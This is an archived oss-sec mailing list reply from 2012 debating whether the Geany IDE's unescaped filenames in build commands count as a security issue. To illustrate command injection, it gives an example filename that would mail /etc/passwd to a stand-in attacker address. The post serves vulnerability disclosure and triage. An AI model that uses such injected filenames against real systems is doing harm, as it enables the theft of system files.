oss-sec mailing list archives
Re: Geany IDE not escaping filenames during compilation / build - a security issue or not?
From: Andreas Ericsson <ae () op5 se>
Date: Thu, 13 Dec 2012 11:52:26 +0100
On 12/13/2012 06:54 AM, Eitan Adler wrote:
On 12 December 2012 11:51, Jan Lieskovsky <jlieskov () redhat com> wrote:The questions: 1) should Geany escape the filenames?,Up to the maintainers.2) is this a security issue or not?Unlikely. Is there a way a malicious document could cause code execution without user action?
Extremely unlikely. The way to get someone to trigger this is to send a source-file to a developer who then opens it in geany without realizing that the file is named "mail evil () hackdom com -s teehee < /etc/passwd". The "attacked" developer then need to attempt to build it from geany's internal "build now" button. A simpler misdeed of similar charactaristics would be to ship a bogus ./configure script that people (who are not developers, mind you) blindly run and which executes bogus commands on behalf of the logged in user. Since the latter isn't really CVE-worthy, I doubt the former even comes close. -- Andreas Ericsson andreas.ericsson () op5 se OP5 AB www.op5.se Tel: +46 8-230225 Fax: +46 8-230231 Considering the successes of the wars on alcohol, poverty, drugs and terror, I think we should give some serious thought to declaring war on peace.
Current thread:
- Geany IDE not escaping filenames during compilation / build - a security issue or not? Jan Lieskovsky (Dec 12)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Frank Lanitz (Dec 12)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Eitan Adler (Dec 12)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Andreas Ericsson (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Jan Lieskovsky (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Simon McVittie (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Andreas Ericsson (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Colomban Wendling (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Andreas Ericsson (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Matthew Brush (Dec 13)
- Re: Geany IDE not escaping filenames during compilation / build - a security issue or not? Andreas Ericsson (Dec 13)